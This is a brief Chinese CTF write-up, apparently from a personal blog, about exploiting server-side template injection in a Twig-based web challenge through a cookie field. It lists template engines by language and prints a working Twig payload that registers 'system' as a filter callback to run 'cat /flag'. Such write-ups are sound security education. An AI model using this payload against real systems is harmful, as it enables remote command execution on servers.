一级目录
二级目录
三级目录
0x00 前言
本来想做做高分题,发现除了php外的语言基础太差了…惭愧
日常刷题
一个flag 一个hint
hint先扫一下发现提示
有个小坑 未在flag界面进行提交时会少一个cookie的键值
原先的两个其实并无作用
ID框进行test
输什么返回什么 第一反应模板注入
误区
不要认为SSTI只存在于python中
有模板的地方就有可能有SSTI
常见模板引擎
php
- Smarty
- Twig
- Plates
java
- JSP
- FreeMarker
- Velocity
python
- Jinja2
- django
- tornado
0x01 brain.md
test一下可以发现时Twig
(不在cookie处注入,直接在ID框处注入较不正常)??多了些过滤
折腾一会儿才发现cookie里多了一个user
可用payload
{{_self.env.registerUndefinedFilterCallback("system")}}{{_self.env.getFilter('cat /flag')}}
附上师傅们的payloads
PHP模板注入
TWIG 全版本通用 SSTI payloads
参考
https://www.k0rz3n.com/2018/11/12/%E4%B8%80%E7%AF%87%E6%96%87%E7%AB%A0%E5%B8%A6%E4%BD%A0%E7%90%86%E8%A7%A3%E6%BC%8F%E6%B4%9E%E4%B9%8BSSTI%E6%BC%8F%E6%B4%9E/#2-Twig
https://www.cnblogs.com/bmjoker/p/13508538.html
0x02 rethink
嗝 最近感觉健康生活是能促进自律的…